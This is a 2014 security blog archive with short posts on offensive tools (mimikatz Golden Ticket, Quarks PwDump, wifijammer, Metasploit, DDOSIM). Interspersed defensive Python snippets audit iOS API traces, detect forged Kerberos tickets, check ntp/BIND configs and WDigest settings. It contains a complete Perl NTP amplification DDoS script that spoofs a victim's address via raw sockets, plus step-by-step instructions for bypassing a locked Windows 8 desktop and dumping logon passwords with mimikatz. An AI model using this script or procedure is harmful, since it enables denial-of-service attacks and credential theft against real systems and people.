Feb 1, 2014

Tools: Introspy-iOS

The tracer can be installed on a jailbroken device to hook and log security-sensitive iOS APIs called by applications running on the device. The tool records details of the relevant API calls, including arguments and return values, and persists them in a database. The calls are also sent to the Console for real-time analysis.
The database can then be fed to Introspy-Analyzer, a Python script that generates HTML reports containing the list of logged function calls as well as a list of potential vulnerabilities affecting the application. Introspy-Analyzer is hosted in a separate repository: https://github.com/iSECPartners/Introspy-Analyzer

Source: https://github.com/iSECPartners/Introspy-iOS
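As an added example of what an analysis pass over such a database looks like (this is not Introspy-Analyzer's code and does not reproduce its schema or rule set; the table layout, the rule list and the traced calls below are all constructed for the example), the snippet loads a handful of traced calls into SQLite, runs each rule against them and renders the findings as an HTML table:

```python
import json
import sqlite3
from html import escape

# Constructed sample of traced calls in an Introspy-like shape. The real
# Introspy database schema is not reproduced here; this layout is an
# assumption made for the example. Each tuple: (class, method, args, return).
SAMPLE_CALLS = [
    ("Security", "SecItemAdd",
     {"kSecAttrAccessible": "kSecAttrAccessibleAlways", "kSecAttrAccount": "session_token"}, 0),
    ("CommonCrypto", "CCCrypt",
     {"alg": "kCCAlgorithmDES", "options": "kCCOptionECBMode", "keyLength": 8}, 0),
    ("NSUserDefaults", "setObject:forKey:",
     {"key": "user_password", "object": "<redacted>"}, None),
    ("NSURLRequest", "setAllowsAnyHTTPSCertificate:forHost:",
     {"allow": True, "host": "api.example.test"}, None),
    ("NSData", "writeToFile:options:error:",
     {"options": "NSDataWritingFileProtectionNone", "path": "/var/mobile/Containers/cache.bin"}, True),
    # A benign call: AES with PKCS7 padding should not trigger the cipher rule.
    ("CommonCrypto", "CCCrypt",
     {"alg": "kCCAlgorithmAES128", "options": "kCCOptionPKCS7Padding", "keyLength": 32}, 0),
]


def build_db(calls):
    """Persist traced calls into an in-memory SQLite database (stand-in for the tracer's output)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE traced_calls (id INTEGER PRIMARY KEY, clazz TEXT, method TEXT, args TEXT, ret TEXT)")
    conn.executemany("INSERT INTO traced_calls (clazz, method, args, ret) VALUES (?, ?, ?, ?)",
                     [(c, m, json.dumps(a), json.dumps(r)) for c, m, a, r in calls])
    conn.commit()
    return conn


# Each rule: (name, class, method, predicate over the decoded args, severity, explanation)
RULES = [
    ("KeychainAccessibleAlways", "Security", "SecItemAdd",
     lambda a: a.get("kSecAttrAccessible") == "kSecAttrAccessibleAlways", "HIGH",
     "Keychain item readable while the device is locked; prefer kSecAttrAccessibleWhenUnlocked."),
    ("WeakCipher", "CommonCrypto", "CCCrypt",
     lambda a: a.get("alg") in ("kCCAlgorithmDES", "kCCAlgorithmRC4") or "ECB" in a.get("options", ""),
     "HIGH", "DES/RC4 or ECB mode used; use AES in an authenticated mode."),
    ("SecretInUserDefaults", "NSUserDefaults", "setObject:forKey:",
     lambda a: any(w in a.get("key", "").lower() for w in ("password", "token", "secret")),
     "MEDIUM", "Credential-like key stored in NSUserDefaults (an unencrypted plist)."),
    ("TLSValidationDisabled", "NSURLRequest", "setAllowsAnyHTTPSCertificate:forHost:",
     lambda a: a.get("allow") is True, "HIGH", "Certificate validation disabled for a host."),
    ("FileProtectionNone", "NSData", "writeToFile:options:error:",
     lambda a: "FileProtectionNone" in a.get("options", ""), "MEDIUM",
     "File written without Data Protection; use NSDataWritingFileProtectionComplete."),
]


def analyze(conn):
    """Run every rule over every traced call; return the list of findings."""
    findings = []
    for call_id, clazz, method, args_json, _ret in conn.execute(
            "SELECT id, clazz, method, args, ret FROM traced_calls ORDER BY id"):
        args = json.loads(args_json)
        for name, r_clazz, r_method, pred, severity, why in RULES:
            if clazz == r_clazz and method == r_method and pred(args):
                findings.append({"id": call_id, "rule": name, "severity": severity,
                                 "call": f"{clazz} {method}", "why": why})
    return findings


def html_report(findings):
    """Render findings as a minimal HTML table (all cells escaped)."""
    rows = "".join(
        f"<tr><td>{f['severity']}</td><td>{escape(f['rule'])}</td>"
        f"<td>{escape(f['call'])}</td><td>{escape(f['why'])}</td></tr>"
        for f in findings)
    return f"<table><tr><th>Severity</th><th>Rule</th><th>Call</th><th>Why</th></tr>{rows}</table>"


if __name__ == "__main__":
    found = analyze(build_db(SAMPLE_CALLS))
    for f in found:
        print(f"[{f['severity']}] {f['rule']}: {f['call']}")
    print(html_report(found))
```

The point of keeping the rules separate from the call records is that a reviewer can extend the rule list for the app under test without touching the tracer or the database.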



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 31, 2014

Howto: Mimikatz - How to use it

mimikatz - Golden Ticket

We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain.

Here is the list of what you need to make it work:
  • krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)
  • Username that we'd like to impersonate

As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user, and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while.
As you know, mimikatz can dump and replay the existing tickets on Windows, so when we get access to a server or workstation and dump the tickets, we can easily replay those on another computer and get access to the same resource. See Google for more info.






    Source: http://rycon.hu/papers/goldenticket.html
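The defender's side of the above, as an added example that is not part of the original post or of mimikatz: a forged TGT is minted offline, so the domain controller that later receives service-ticket requests (event 4769) for that account has never logged a TGT request (event 4768) for it. The snippet correlates the two event types over a constructed set of records; the NetBIOS-name check is a secondary indicator that has been reported for mimikatz-forged tickets, and the domain name CORP is an assumption of the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Kerberos audit events in the shape a DC's Security log provides
# (4768 = TGT requested, 4769 = service ticket requested). Made up for the example.
SAMPLE_EVENTS = [
    {"time": "2014-01-31T08:00:00", "id": 4768, "user": "alice", "domain": "CORP",
     "service": "krbtgt", "client_ip": "10.0.0.21"},
    {"time": "2014-01-31T08:00:05", "id": 4769, "user": "alice", "domain": "CORP",
     "service": "cifs/files01", "client_ip": "10.0.0.21"},
    # Two TGS requests for the administrator with no preceding TGT request and a
    # fully-qualified account domain: the pattern a forged TGT leaves behind.
    {"time": "2014-01-31T09:30:00", "id": 4769, "user": "Administrator", "domain": "corp.example.test",
     "service": "cifs/dc01", "client_ip": "10.0.0.99"},
    {"time": "2014-01-31T09:30:02", "id": 4769, "user": "Administrator", "domain": "corp.example.test",
     "service": "ldap/dc01", "client_ip": "10.0.0.99"},
]

MAX_TGT_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket"
NETBIOS_DOMAIN = "CORP"                 # the domain's short name (assumed for the example)


def detect_forged_tgt_use(events, max_tgt_lifetime=MAX_TGT_LIFETIME, netbios_domain=NETBIOS_DOMAIN):
    """Flag 4769 events that cannot be explained by a 4768 logged on this DC.

    Returns a list of alerts, each carrying the suspicious event and the reasons.
    """
    events = sorted(events, key=lambda e: e["time"])
    tgt_issued = defaultdict(list)  # user (lower-cased) -> times of 4768 events
    alerts = []
    for e in events:
        t = datetime.fromisoformat(e["time"])
        user = e["user"].lower()
        if e["id"] == 4768:
            tgt_issued[user].append(t)
            continue
        if e["id"] != 4769:
            continue
        reasons = []
        # A service ticket is only issued against a TGT; a genuine TGT shows up as
        # a 4768 for the same account no older than the ticket lifetime.
        if not any(timedelta(0) <= t - issued <= max_tgt_lifetime for issued in tgt_issued[user]):
            reasons.append("no 4768 (TGT request) for this account within the TGT lifetime")
        # Windows writes the NetBIOS domain into the account-domain field; tickets
        # forged with mimikatz have been observed carrying the FQDN instead.
        if e["domain"] != netbios_domain:
            reasons.append(f"account domain {e['domain']!r} is not the NetBIOS name {netbios_domain!r}")
        if reasons:
            alerts.append({"time": e["time"], "user": e["user"], "client_ip": e["client_ip"],
                           "service": e["service"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_forged_tgt_use(SAMPLE_EVENTS):
        print(f"{a['time']} {a['user']}@{a['client_ip']} -> {a['service']}: " + "; ".join(a["reasons"]))
```

Logs from every domain controller have to be merged before running this correlation, because the 4768 may legitimately have been served by a different DC than the one that later sees the 4769. Once a krbtgt compromise is suspected, the remediation is to reset the krbtgt password twice, allowing replication to complete between the two resets, which invalidates all previously issued TGTs including forged ones.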





    Article: Is your system ready for the new era of DDoS?

    An article from the CSIRT team of I-SECURE Co., Ltd., www.i-secure.co.th

     https://dl.dropboxusercontent.com/u/2330423/%E0%B8%A3%E0%B8%B0%E0%B8%9A%E0%B8%9A%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B9%80%E0%B8%95%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%81%E0%B8%B1%E0%B8%9A%20DDoS%20%E0%B8%A2%E0%B8%B8%E0%B8%84%E0%B9%83%E0%B8%AB%E0%B8%A1%E0%B9%88%E0%B9%81%E0%B8%A5%E0%B9%89%E0%B8%A7%E0%B8%AB%E0%B8%A3%E0%B8%B7%E0%B8%AD%E0%B8%A2%E0%B8%B1%E0%B8%87.pdf



    Howto: Checking Servers for Amplification Attack Vulnerabilities

    - Check whether a server has the NTP amplification vulnerability
    http://openntpproject.org/
        Test with ntpdc -c monlist <NTP_SERVER_IP>; to run the test on BackTrack or another Linux distribution you must install the ntp package.
     
    - Check whether a server has the DNS amplification vulnerability (open resolver)
    http://openresolverproject.org/
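Both checks above query a live server from the outside. The complementary check, as an added example that is not part of the original post or of either project, is to audit the server's own configuration for the settings that cause the exposure: for ntpd, the absence of "disable monitor" or of "noquery" on the default restrict line (which is what makes monlist answerable; ntpd 4.2.7p26 and later no longer honour monlist at all), and for BIND, recursion left open to everyone. The configuration fragments are constructed, and the parser is line-based rather than a full grammar for either format.

```python
import re

# Constructed ntp.conf and named.conf fragments (not taken from any real host).
WEAK_NTP_CONF = """\
driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org
server 1.pool.ntp.org
restrict 127.0.0.1
"""

HARDENED_NTP_CONF = """\
driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org
server 1.pool.ntp.org
disable monitor
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict -6 ::1
"""

WEAK_NAMED_CONF = """\
options {
    directory "/var/cache/bind";
    recursion yes;
};
"""

HARDENED_NAMED_CONF = """\
acl trusted { 127.0.0.1; 10.0.0.0/8; };
options {
    directory "/var/cache/bind";
    recursion yes;
    allow-recursion { trusted; };
    allow-query-cache { trusted; };
};
"""


def _directives(text):
    """Yield non-empty lines with '#' comments stripped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line


def audit_ntp_conf(text):
    """Return findings describing monlist (mode 7) exposure in an ntpd configuration."""
    findings = []
    lines = list(_directives(text))
    monitor_disabled = any(re.fullmatch(r"disable\s+.*\bmonitor\b.*", l) for l in lines)
    default_restricts = [l for l in lines if re.match(r"restrict\s+(-[46]\s+)?default\b", l)]
    default_noquery = bool(default_restricts) and all("noquery" in l for l in default_restricts)
    if not monitor_disabled:
        findings.append("no 'disable monitor': the MRU list behind 'ntpdc -c monlist' is kept and can be queried")
    if not default_restricts:
        findings.append("no 'restrict default' line: any client may send mode 6/7 control queries")
    elif not default_noquery:
        findings.append("'restrict default' lacks 'noquery': control queries (including monlist) are still answered")
    return findings


def audit_named_conf(text):
    """Return findings describing open-recursion exposure in a BIND configuration."""
    findings = []
    body = "\n".join(_directives(text))
    # 'recursion yes' is BIND's default when the directive is absent.
    recursion_on = re.search(r"\brecursion\s+no\s*;", body) is None
    scoped = re.search(r"\ballow-recursion\s*\{", body) is not None
    if recursion_on and not scoped:
        findings.append("recursion enabled with no 'allow-recursion' ACL: the server is an open resolver")
    if recursion_on and re.search(r"\ballow-recursion\s*\{\s*any\s*;", body):
        findings.append("'allow-recursion { any; }' makes the server an open resolver")
    return findings


if __name__ == "__main__":
    for label, text, fn in (("ntp weak", WEAK_NTP_CONF, audit_ntp_conf),
                            ("ntp hardened", HARDENED_NTP_CONF, audit_ntp_conf),
                            ("bind weak", WEAK_NAMED_CONF, audit_named_conf),
                            ("bind hardened", HARDENED_NAMED_CONF, audit_named_conf)):
        print(f"{label}: {fn(text) or ['OK']}")
```

Run the two audit functions over the files pulled from your own servers; an empty list means the configuration does not carry the exposure the external checks look for, while each finding names the missing directive to add.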



    Tools: NTP Amplification Attack Tool

    use threads;
    use Socket;

    my $num_of_threads = $ARGV[5];
    my $target = $ARGV[0];
    my $udp_src_port = $ARGV[1];
    my $time = $ARGV[2];
    #Open Input List.
    my $openme = $ARGV[3];

    open my $handle, '<', $openme;
    chomp(my @servers = <$handle>);
    close $handle;

    my $ppr = $ARGV[4];
    my @threads = initThreads();
    print "I guess im attacking $target for $time seconds with $num_of_threads threads\n";

    #Does the list exist?
    if (-e $openme) {
        print "Using $openme as list.\n";
    }
    unless (-e $openme) {
        print "List does not exist.\n";
        exit();
    }

    #Start Threading
    foreach (@threads) {
        $_ = threads->create(\&attackshit);
    }
    foreach (@threads) {
        $_->join();
    }

    sub initThreads {
        my @initThreads;
        for (my $i = 1; $i <= $num_of_threads; $i++) {
            push(@initThreads, $i);
        }
        return @initThreads;
    }

    #Start DDosing.
    sub attackshit {
        alarm("$time");
        repeat: my $ip_dst = ( gethostbyname( $servers[ int( rand(@servers) ) ] ) )[4];
        my $ip_src = ( gethostbyname($target) )[4];
        socket( RAW, AF_INET, SOCK_RAW, 255 ) or die $!;
        setsockopt( RAW, 0, 1, 1 );
        main();

        sub main {
            my $packet;
            $packet = ip_header();
            $packet .= udp_header();
            $packet .= payload();
            #send_packet($packet) && goto repeat;
            #send_packet($packet)
            for (1 .. $ppr) {
                send_packet($packet) or last;
            }
            goto repeat;
        }

        sub ip_header {
            my $ip_ver = 4;
            my $ip_header_len = 5;
            my $ip_tos = 0;
            my $ip_total_len = $ip_header_len + 20;
            my $ip_frag_id = 0;
            my $ip_frag_flag = "010";#"\x30\x31\x30";
            my $ip_frag_offset = "0000000000000";#"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30";
            my $ip_ttl = 255;
            my $ip_proto = 17;
            my $ip_checksum = 0;
            my $ip_header = pack( "H2 H2 n n B16 h2 c n a4 a4",#"\x48\x32\x20\x48\x32\x20\x6E\x20\x6E\x20\x42\x31\x36\x20\x68\x32\x20\x63\x20\x6E\x20\x61\x34\x20\x61\x34",
                $ip_ver.$ip_header_len,
                $ip_tos,
                $ip_total_len,
                $ip_frag_id,
                $ip_frag_flag.$ip_frag_offset,
                $ip_ttl,
                $ip_proto,
                $ip_checksum,
                $ip_src,
                $ip_dst
            );
            return $ip_header;
        }

        sub udp_header {
            my $udp_dst_port = 123;
            my $udp_len = 8 + length( payload() );
            my $udp_checksum = 0;
            my $udp_header = pack(
                "n n n n",#"\x6E\x20\x6E\x20\x6E\x20\x6E",
                $udp_src_port,
                $udp_dst_port,
                $udp_len,
                $udp_checksum
            );
            return $udp_header;
        }

        sub payload {
            my $data = "\x17\x00\x03\x2a" . "\x00" x 4;
            my $payload = pack( "a".length($data), $data );
            return $payload;
        }

        sub send_packet {
            send( RAW, $_[0], 0, pack( "Sna4x8", AF_INET, 60, $ip_dst ) );
        }

    }
     
     




    Tools: VMware Unlocker to Run Mac OS X Guests in Windows 7/8/8.1

    For a Hackintosh user, desktop virtualization software such as VMware is a must for making USB installers, restoring images and so on, and the "VMware Unlocker" is a compulsory utility for running Mac OS X guests. The unlocker overwrites a few VMware program files so that the latest OS X guests (10.7 Lion, 10.8 and 10.9) can be installed and run.
    Here are the download links: http://hackintoshmumbai.com/Download/





    Tools: Wifijammer

    Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting.
    Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection

    Source: https://github.com/DanMcInerney/wifijammer




    Jan 30, 2014

    Tools: Quarks PwDump - Dump password of Windows

    Quarks PwDump is a new open source tool to dump various types of Windows credentials: local accounts, domain accounts, cached domain credentials and BitLocker. The tool is currently dedicated to working live on the operating system, limiting the risk of undermining its integrity or stability. It requires administrator privileges and is still in beta test.
    Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems.
    It currently extracts:
    - Local accounts NT/LM hashes + history
    - Domain accounts NT/LM hashes + history stored in the NTDS.dit file
    - Cached domain credentials
    - BitLocker recovery information (recovery passwords & key packages) stored in NTDS.dit


    Source: http://blog.quarkslab.com/quarks-pwdump.html



    Jan 29, 2014

    Howto: Create initial user in Metasploit with Web UI

    For anyone who has installed Metasploit on a server and cannot access the Metasploit Web UI but wants to create an initial user for Web UI access, please follow these steps.

    1. Using diagnostic_shell in metasploit
    sudo /opt/metasploit/diagnostic_shell

    2. Go to script folder
    cd /opt/metasploit/apps/pro/ui


    3. Create initial user with script
    ruby script/createuser

    *** If you want to configure the binding interface of the Metasploit Web UI, try customizing /opt/metasploit/properties.ini



    Jan 28, 2014

    Howto: Load clear text password from locked Desktop of Windows 8

    1. You must have physical access.

    2. Use the "Utilman Login Bypass" by pressing the "Windows" and "u" keys on the keyboard.

    3. Plug in a USB drive that has Mimikatz on it (download from: http://blog.gentilkiwi.com/mimikatz)

    4. Run mimikatz

    5. Use privilege::debug in the mimikatz console

    6. Use inject::process in the mimikatz console, e.g. inject::process lsass.exe sekurlsa.dll

    7. Run @getLogonPasswords in the mimikatz console

    8. After the last command, you will get the hashed password of the currently logged-in user.



    *** In newer versions, you can skip #5 and #6 with sekurlsa::logonPasswords or sekurlsa::logonPasswords full


    Source: http://cyberarms.wordpress.com/2012/11/10/windows-8-clear-text-passwords-from-locked-desktop-with-mimikatz/
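The procedure above works because LSASS on Windows 8 (and earlier) keeps a reversible WDigest copy of each logged-on user's password. As an added example that is not part of the original post or of mimikatz, the following audits a "reg export" of the WDigest key to tell whether a host is in that state; the registry exports are constructed for the example, and the OS-dependent default for an absent value is passed in by the caller.

```python
import re

# Constructed `reg export` outputs of the WDigest key (not taken from any real
# host). reg.exe writes UTF-16LE; decode the file before handing it to the parser.
WDIGEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

REG_CLEARTEXT_ON = f"""Windows Registry Editor Version 5.00

[{WDIGEST_KEY}]
"Debuglevel"=dword:00000000
"Negotiate"=dword:00000000
"UTF8HTTP"=dword:00000001
"UTF8SASL"=dword:00000001
"DigestEncryptionAlgorithms"="3des,rc4"
"UseLogonCredential"=dword:00000001
"""

# Same host after the value has been set to 0.
REG_CLEARTEXT_OFF = REG_CLEARTEXT_ON.replace('"UseLogonCredential"=dword:00000001',
                                             '"UseLogonCredential"=dword:00000000')

# Fresh install: the value has never been set, so the OS default applies.
REG_VALUE_ABSENT = "\n".join(l for l in REG_CLEARTEXT_ON.splitlines()
                             if "UseLogonCredential" not in l) + "\n"


def parse_reg_export(text):
    """Minimal parser for a Regedit 5.00 export: {key_path: {value_name: raw_value}}.

    Multi-line hex(...) values are not handled, which is fine for this key.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip('"')] = value.strip()
    return keys


def wdigest_stores_cleartext(reg_text, absent_means_off):
    """Return True when LSASS keeps a reversible WDigest copy of logon passwords.

    absent_means_off: True for Windows 8.1 / Server 2012 R2, where cleartext
    caching is off unless UseLogonCredential is set to 1; False for Windows 7 /
    8 / Server 2008 R2 / 2012, where the value (added by KB2871997) must be
    explicitly 0 to turn caching off.
    """
    values = parse_reg_export(reg_text).get(WDIGEST_KEY, {})
    raw = values.get("UseLogonCredential")
    if raw is None:
        return not absent_means_off
    m = re.fullmatch(r"dword:([0-9a-fA-F]{8})", raw)
    if m is None:
        return True  # unexpected value type: treat as unsafe and investigate
    return int(m.group(1), 16) != 0


def audit(reg_text, absent_means_off):
    """Human-readable verdict for one host's export."""
    if wdigest_stores_cleartext(reg_text, absent_means_off):
        return ("FAIL: WDigest caches cleartext passwords in LSASS; set UseLogonCredential=0 "
                "(and apply KB2871997 first on pre-8.1 systems)")
    return "PASS: WDigest cleartext caching disabled"


if __name__ == "__main__":
    for label, text in (("enabled", REG_CLEARTEXT_ON), ("disabled", REG_CLEARTEXT_OFF),
                        ("absent", REG_VALUE_ABSENT)):
        print(f"{label:9} win8  : {audit(text, absent_means_off=False)}")
        print(f"{label:9} win8.1: {audit(text, absent_means_off=True)}")
```

A value of 1 on a host that should have it at 0 is itself worth an alert, since re-enabling WDigest caching is a known step taken before dumping credentials.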


    Jan 26, 2014

    Tools: rekall - Memory Forensics Analysis framework

    The Rekall Memory Forensics Framework

     

    Source: https://code.google.com/p/rekall/




    Howto: Multi-host check in Metasploit allows you to pwn faster

    msf > use exploits/windows/smb/ms08_067_netapi
    msf > check 192.168.1.1-192.168.1.100

    Waiting for results  

     

    Source: https://twitter.com/_sinn3r/status/427202485174800384/photo/1


    Tools: DDOSIM - Layer 7 DDoS Simulator

    DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. HTTP server).

    Source:  http://sourceforge.net/projects/ddosim/


     
